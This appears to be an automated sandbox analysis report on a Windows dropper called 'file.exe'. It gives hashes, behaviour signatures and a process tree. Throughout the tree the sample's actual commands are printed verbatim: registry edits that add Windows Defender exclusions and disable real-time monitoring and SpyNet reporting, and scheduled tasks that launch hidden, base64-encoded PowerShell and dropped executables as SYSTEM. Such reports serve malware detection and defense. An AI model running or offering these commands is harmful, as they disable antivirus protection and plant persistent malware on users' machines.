Analysis

  • max time kernel
    129s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2022 10:03

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    b80b22d11193ab71cb8cdbfeb37da16f

  • SHA1

    b3335d1375a575e09a12dd8fdcd6d82595b021fe

  • SHA256

    3413d80c4cfdf5760bbacf307959ef194e4b9596a66d4078fb57d5a12ab10b7e

  • SHA512

    c64ed279aa67f0851d768081f0cb2e52a09a82742f5c6932dd3762fd504afa0e82f63f0690d80ac8064009536da093e28d48ca7a04315a16db2e4dd82c799b37

  • SSDEEP

    196608:91O6FYGFwHcq9FgHUkGW3+J0Wh9sNm7aIKw25S3YN/CPfxcN:3O6OlcqwjN3g0WheNKhKxc3e/Ww

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 23 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Users\Admin\AppData\Local\Temp\7zSFE4D.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Users\Admin\AppData\Local\Temp\7zSAFA.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:368
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:768
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:1008
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:1580
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:904
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:872
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:876
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:764
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gOvpDOAhz" /SC once /ST 10:36:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1724
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gOvpDOAhz"
                  4⤵
                    PID:456
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gOvpDOAhz"
                    4⤵
                      PID:1968
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "byLWBUphYKVPGqoaZN" /SC once /ST 12:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\AxVxsZx.exe\" rw /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:1420
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {26D96536-F238-4D0B-8837-3235C92B77E6} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
                1⤵
                  PID:1260
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1984
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:1304
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:672
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:324
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:876
                        • C:\Windows\system32\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          3⤵
                            PID:1848
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                          2⤵
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1980
                          • C:\Windows\system32\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            3⤵
                              PID:1692
                        • C:\Windows\system32\gpscript.exe
                          gpscript.exe /RefreshSystemParam
                          1⤵
                            PID:1692
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {3948FB89-48DE-46F3-9FE7-70BC277E27CB} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                              PID:1704
                              • C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\AxVxsZx.exe
                                C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\AxVxsZx.exe rw /site_id 525403 /S
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:804
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gBTYCPbda" /SC once /ST 08:06:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:1580
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gBTYCPbda"
                                  3⤵
                                    PID:764
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gBTYCPbda"
                                    3⤵
                                      PID:1956
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      3⤵
                                        PID:1596
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                          4⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:112
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        3⤵
                                          PID:1284
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                            4⤵
                                            • Modifies Windows Defender Real-time Protection settings
                                            PID:1212
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "gZYFuYqPM" /SC once /ST 06:31:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:1780
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "gZYFuYqPM"
                                          3⤵
                                            PID:1440
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gZYFuYqPM"
                                            3⤵
                                              PID:1332
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:1568
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:760
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:1172
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1628
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:1600
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1304
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:1596
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1760
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C copy nul "C:\Windows\Temp\oCRUNVefZTIhACRx\NJXeFXiY\AZxBjVlufkvzSZsF.wsf"
                                                          3⤵
                                                            PID:1284
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\oCRUNVefZTIhACRx\NJXeFXiY\AZxBjVlufkvzSZsF.wsf"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:572
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:368
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1604
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1480
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:876
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:472
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1936
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1652
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:968
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1940
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1520
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\euGiausHkJdtKpVB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1528
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\euGiausHkJdtKpVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1736
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1956
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1596
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1284
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1708
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:1208
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:688
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:1580
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:1392
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:1316
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:1800
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:1848
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:1996
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                                PID:1568
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                  PID:1496
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\euGiausHkJdtKpVB" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:576
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\euGiausHkJdtKpVB" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:924
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk" /t REG_DWORD /d 0 /reg:32
                                                                                      4⤵
                                                                                        PID:1344
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                          PID:1212
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:32
                                                                                          4⤵
                                                                                            PID:1944
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\oCRUNVefZTIhACRx" /t REG_DWORD /d 0 /reg:64
                                                                                            4⤵
                                                                                              PID:1880
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "gaiiGYHwk" /SC once /ST 03:05:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:1480
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "gaiiGYHwk"
                                                                                            3⤵
                                                                                              PID:1640
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "gaiiGYHwk"
                                                                                              3⤵
                                                                                                PID:968
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                3⤵
                                                                                                  PID:1364
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                    4⤵
                                                                                                      PID:1736
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                    3⤵
                                                                                                      PID:1140
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                        4⤵
                                                                                                          PID:612
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "iczjDJyUUtiHxBiey" /SC once /ST 07:51:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\AuITKwu.exe\" pp /site_id 525403 /S" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:820
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "iczjDJyUUtiHxBiey"
                                                                                                        3⤵
                                                                                                          PID:112
                                                                                                      • C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\AuITKwu.exe
                                                                                                        C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\AuITKwu.exe pp /site_id 525403 /S
